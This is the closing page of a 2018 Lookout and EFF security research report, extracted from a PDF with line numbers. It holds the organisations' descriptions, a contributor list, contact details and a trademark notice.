1096of millions of individuals, hundreds of enterprises and government agencies, and such ecosystem partners as AT&T, Deutsche Telekom, and Microsoft. Headquartered in San Francisco, Lookout has of ces in Amsterdam, Boston, London, Sydney, Tokyo, Toronto and Washington, D.C.
1097About EFF
1098The Electronic Frontier Foundation is the leading nonpro t organization defending civil liberties in the digital world. Founded in 1990, EFF champions user privacy, free expression, and innovation through impact litigation, policy analysis, grassroots activism, and technology development. We work to ensure that rights and freedoms are enhanced and protected as our use of technology grows.
1099Contributors
1100Andrew Blaich, Lookout Apurva Kumar, Lookout Jeremy Richards, Lookout Michael Flossman, Lookout
1101Cooper Quintin, EFF Eva Galperin, EFF
1102Special thanks to the many others in our organization, and to our partners, who contributed signi cantly to this work.
1103SECURITY RESEARCH REPORT
1104 Lookout Website
1105www.lookout.com
1106Blog
1107blog.lookout.com
1108Email
1109threatintel@lookout.com
1110Twitter
1111@lookout
1112 EFF Website
1113www.eff.org
1114Blog
1115www.eff.org/deeplinks
1116Email
1117press@eff.org
1118Twitter
1119@eff
1120© 2018 Lookout, Inc. LOOKOUT®, the Lookout Shield Design®, LOOKOUT with Shield Design®, SCREAM®, and SIGNAL FLARE® are registered trademarks of Lookout, Inc. in the United States and other countries. EVERYTHING IS OK®, LOOKOUT MOBILE SECURITY®, and PROTECTED BY LOOKOUT®, are registered trademarks of Lookout, Inc. in the United States. POWERED BY LOOKOUTTM is a trademark of Lookout, Inc. All other brand and product names are trademarks or registered trademarks of their respective holders. 20180118-Lookout-USv1.0
11211-888-988-5795 | lookout.com
1122 49